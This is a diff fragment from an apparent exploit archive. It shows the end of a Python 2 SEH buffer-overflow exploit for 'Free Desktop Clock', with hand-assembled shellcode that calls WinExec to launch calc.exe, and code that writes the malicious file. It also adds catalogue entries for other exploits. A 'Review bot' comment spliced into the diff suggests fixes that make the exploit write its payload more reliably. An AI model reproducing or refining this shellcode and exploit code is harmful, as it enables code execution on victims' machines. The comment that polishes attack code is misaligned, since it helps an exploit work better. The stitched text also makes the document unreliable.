0x6578652e ; exe. : 6578652e +callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163 +callWinExec += '\x33\xC0' # xor eax, eax +callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax +callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 +callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument +callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument +callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function + +shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec + +buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode +filler = '\x77'*(9000-len(buffer)) +buffer = buffer+filler + +try: + payload = buffer + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 558ffa2fb..5c32f12c6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
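Review bot: The closing `try` block ends in a bare `except:` that prints only `File + ' failed to create'`, discarding the exception, and `f` is never closed when `f.write` raises; a `with open(File, 'wb')` plus `except (IOError, OSError) as e` keeps the handle safe, reports why the write failed, and writes the buffer byte-for-byte instead of going through text-mode newline translation on the Windows hosts the header names as the target. The `payload = buffer` alias adds nothing and can go. Separately, `os_decoder = '\x90'*((512/2)-len(...))` and the `print` statements pin the script to Python 2: under Python 3 `512/2` is a float and `'\x90' * float` raises `TypeError`, so `512//2` is correct on both interpreters and the header should say the script needs Python 2.
```python
# … unchanged: buffer construction …
try:
    with open(File, 'wb') as f:
        f.write(buffer)
    print File + " created successfully"
except (IOError, OSError) as e:
    print File + ' failed to create: ' + str(e)
```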
@@ -11026,6 +11026,7 @@ id,file,description,date,author,type,platform,port
 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
+48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42550,3 +42551,9 @@ id,file,description,date,author,type,platform,port
 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
+48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware,
+48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware,
+48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,
+48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
+48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
+48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,